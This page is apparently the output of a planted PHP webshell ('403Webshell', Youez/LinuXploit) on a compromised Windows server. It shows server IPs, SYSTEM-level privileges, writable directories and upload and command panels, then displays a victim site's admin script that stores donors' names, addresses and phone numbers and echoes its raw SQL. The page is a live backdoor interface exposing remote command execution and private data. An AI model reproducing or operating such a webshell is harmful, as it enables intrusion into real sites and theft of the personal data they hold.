403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/www/news/csr/admin/core/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : E:/Inetpub/www/news/csr/admin/core/add_donate_detail.php
<?php
if(!isset($_SESSION)) session_start();
if(isset($_SESSION['ugroup'])){ 
$user=$_SESSION["loguser"];
$ugroup=$_SESSION["ugroup"];
$setyear=date("Y")+543; 
require_once "../../include/config.php";
require_once "../../include/PasswordHash.php";

//$u_scid  = $mysqli->escape_string($_POST['u_scid']);
$u_donate  = $mysqli->escape_string($_POST['u_donate']);
$u_name  = $mysqli->escape_string($_POST['u_name']);
$u_address  = $mysqli->escape_string($_POST['u_address']);
$u_subdistrict  = $mysqli->escape_string($_POST['u_subdistrict']);
$u_district  = $mysqli->escape_string($_POST['u_district']);
$u_province  = $mysqli->escape_string($_POST['u_province']);
$u_postcode  = $mysqli->escape_string($_POST['u_postcode']);
$u_tel  = $mysqli->escape_string($_POST['u_tel']);
$u_type  = $mysqli->escape_string($_POST['u_type']);
$u_datail  = $mysqli->escape_string($_POST['u_datail']);
$u_max  = $mysqli->escape_string($_POST['u_max']);
$u_sarary  = $mysqli->escape_string($_POST['u_sarary']);
$u_date  = $mysqli->escape_string($_POST['u_date']);
$u_month  = $mysqli->escape_string($_POST['u_month']);
$u_year  = $mysqli->escape_string($_POST['u_year']);


$sql = "INSERT INTO tb_donated(   u_scid,    u_donate,    u_name,   u_address,    u_subdistrict,    u_district,    u_province,    u_postcode,    u_tel,    u_type,    u_datail,    u_max,    u_sarary,    u_date,    u_month,   u_year ) ";
                $sql .= "VALUES ('$user', '$u_donate', '$u_name', '$u_address', '$u_subdistrict', '$u_district', '$u_province', '$u_postcode', '$u_tel', '$u_type', '$u_datail', '$u_max', '$u_sarary', '$u_date', '$u_month', '$u_year' )";
echo $sql ;                
$mysqli->query($sql) or die (mysqli_error());
header("Location: ../account.php?page=donate_detail&op31=1&msg=added_ok");	
exit;
} else {
header("Location: ../index.php?msg=error");
exit;
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit